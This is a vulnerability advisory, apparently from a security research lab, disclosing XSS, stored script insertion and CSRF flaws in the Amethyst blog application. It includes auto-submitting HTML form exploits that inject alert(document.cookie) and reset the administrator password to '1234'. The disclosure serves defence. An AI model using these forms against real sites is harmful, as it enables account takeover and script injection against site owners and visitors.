Multiple Vulnerabilities in Amethyst

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Amethyst which could be exploited to perform cross-site scripting, script insertion and cross-site request forgery attacks.

1. Cross-site scripting (XSS) vulnerability in Amethyst
   The vulnerability exists due to input sanitation error in the “setting[site_title]” parameter in admin/update_settings. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
   Exploitation example:
   <form action=“http://host/admin/update_settings” method=“post” name=“main” >
   <input type=“hidden” name=“setting[site_title]” value=‘My blog"><script>alert(document.cookie)</script>’ />
   <input type=“hidden” name=“setting[site_description]” value=“Welcome to My Amethyst Blog!” />
   <input type=“hidden” name=“setting[site_keywords]” value=“amethyst blog, xss” />
   <input type=“hidden” name=“setting[enable_site_title]” value=“1” />
   <input type=“hidden” name=“setting[posts_per_page]” value=“10” />
   <input type=“hidden” name=“setting[archive_months_to_show]” value=“12” />
   <input type=“hidden” name=“setting[enable_menu_archive]” value=“1” />
   <input type=“hidden” name=“setting[enable_menu_search]” value=“1” />
   <input type=“hidden” name=“setting[enable_menu_tools]” value=“0” />
   <input type=“hidden” name=“setting[enable_menu_other]” value=“1” />
   <input type=“hidden” name=“setting[item_thumbnail_width]” value=“100” />
   <input type=“hidden” name=“setting[item_thumbnail_height]” value=“100” />
   <input type=“hidden” name=“setting[resize_item_images]” value=“0” />
   <input type=“hidden” name=“setting[item_image_width]” value=“500” />
   <input type=“hidden” name=“setting[item_image_height]” value=“500” />
   <input type=“hidden” name=“commit” value=“Update Settings” />
   </form>
   <script>
   document.main.submit();
   </script>

2. Script insertion vulnerability in Amethyst
   Input passed to the all fields in browse/create_comment is not properly sanitized when edited by administrator. A remote attacker can insert arbitrary HTML and script code, which will be executed in users browser in context of the vulnerable website when sites administrator modifies the comment.

3. Cross-site request forgery (CSRF) vulnerabilities in Amethyst: CVE-2010-5085
   3.1 The vulnerability exists due to insufficient validation of the request origin in admin/update_user/. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
   Exploitation example:
   <form action=“http://host/admin/update_user/1” method=“post” name=“main” >
   <input type=“hidden” name=“user[username]” value=“admin” />
   <input type=“hidden” name=“user[first_name]” value=“First Name” />
   <input type=“hidden” name=“user[last_name]” value=“Last Name” />
   <input type=“hidden” name=“user[password]” value=“1234” />
   <input type=“hidden” name=“user[password_confirmation]” value=“1234” />
   <input type=“hidden” name=“commit” value=“Update” />
   </form>
   <script>
   document.main.submit();
   </script>
   3.2 The vulnerability exists due to insufficient validation of the request origin in admin/update. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create new publication.
   Exploitation example:
   <form action=“http://host/admin/update/2” method=“post” name=“main” >
   <input type=“hidden” name=“post[title]” value=‘title"><script>alert(document.cookie)</script>’ />
   <input type=“hidden” name=“post[content]” value=“this is my post” />
   <input type=“hidden” name=“post[created_at(1i)]” value=“2010” />
   <input type=“hidden” name=“post[created_at(2i)]” value=“7” />
   <input type=“hidden” name=“post[created_at(3i)]” value=“15” />
   <input type=“hidden” name=“post[created_at(4i)]” value=“20” />
   <input type=“hidden” name=“post[created_at(5i)]” value=“39” />
   <input type=“hidden” name=“post[updated_at(1i)]” value=“2010” />
   <input type=“hidden” name=“post[updated_at(2i)]” value=“7” />
   <input type=“hidden” name=“post[updated_at(3i)]” value=“15” />
   <input type=“hidden” name=“post[updated_at(4i)]” value=“20” />
   <input type=“hidden” name=“post[updated_at(5i)]” value=“39” />
   <input type=“hidden” name=“commit” value=“Create” />
   </form>
   <script>
   document.main.submit();
   </script>